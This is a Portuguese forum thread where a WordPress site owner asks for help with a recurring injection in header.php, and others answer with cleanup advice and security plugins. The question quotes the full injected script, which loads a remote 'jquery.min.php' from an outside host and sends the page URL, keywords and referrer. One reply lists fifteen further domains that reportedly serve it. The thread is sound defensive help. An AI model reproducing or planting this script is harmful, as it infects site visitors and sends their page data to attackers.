PERGUNTA

Malware em meu site wordpress (jquery.min fake)

foto de
Claudio Leminski

Tenho um site em wordpress que está seguidamente sendo atacado. Esse script abaixo sempre aparece no meu cabeçalho (header.php) e meu site não abre, fica com uma tela em branco.

<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://sweetsalesgirl.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>

Eu apago o script,  ele some um tempo e depois volta. Já não sei mais o que fazer. Alguém está passando ou passou por isso? 

Respostas 2

Consegue ajudar? A comunidade agradece

foto do perfil Marco Mascarenhas Marco Mascarenhas

@Claudio, passei por isso com alguns sites meus também.  Para solucionar o problema primeiro é importante identificar o problema. Algum arquivo está servindo como porta de entrada de malwares no seu site. 

É importante atualizar a versão do #Wordpress para a mais recente e verificar principalmente seus plugins e  arquivos do tema usado para ver se encontra algum arquivo malicioso.

Sugiro você também verificar se existe algum arquivos suspeito na raiz do site. Normalmente os arquivos que são do core do wordpress são esses:

  1. /wp-admin/
  2. /wp-content/
  3. /wp-includes/
  4. index.php
  5. license.txt
  6. readme.html
  7. wp-activate.php
  8. wp-blog-header.php
  9. wp-comments-post.php
  10. wp-config.php
  11. wp-config-sample.php
  12. wp-cron.php
  13. wp-links-opml.php
  14. wp-load.php
  15. wp-login.php
  16. wp-mail.php
  17. wp-settings.php
  18. wp-signup.php
  19. wp-trackback.php
  20. xmlrpc.php

Para facilitar esse trabalho de procura de malware eu usei um plugin que foi bastante eficaz. O nome do plugin é Anti-Malware Security and Brute-Force Firewall. Pra mim ele serviu muito bem. Encontrou as portas de entrada e limpou os arquivos infectados.

Um outro ponto importante é trocar as senhas de administrador do painel administrativo do wordpress. Espero que tenha ajudado

foto do perfil Telma Gomes Souza Telma Gomes Souza

Essa galera que fica criando essas besteiras não tem o que fazer não, né?

Fui pesquisar mais sobre esse problema e tem inúmeras pessoas no mundo sofrendo do mesmo mal...ware.  ;)

Só que as páginas que o jquery.min.php é inserido são de diversos endereços diferentes:

http://brittaschmeis.ed/js/jquery.min.php
http://www.rentalnyc.com/js/jquery.min.php
http://sairikuncle.com/js/jquery.min.php
http://doman.epart.com/js/jquery.min.php
http://yarplem.ru/js/jquery.min.php
http://shiro-mega.com/js/jquery.min.php
http://educalia.edu.mx/js/jquery.min.php
http://vkgraf.ru/js/jquery.min.php
http://im.bhca.ws/js/jquery.min.php
http://agn.eng.br/js/jquery.min.php
http://www.kobers.de/js/jquery.min.php
http://vertekoasys.com/js/jquery.min.php
http://jonuts.com/js/jquery.min.php
http://buro-tweevoud.nl/js/jquery.min.php
http://www.unvc.com.ua/js/jquery.min.php

E isso não está acontecendo somente no Wordpress não.  O #Joomla também está sofrendo esses ataques.

Eu uso muito o Wordfence e ele me alerta quando qualquer arquivo que não deveria ser modificado, foi.  Eu já li um pessoal falando bem do Sucuri Plugin, mas esse eu nunca usei.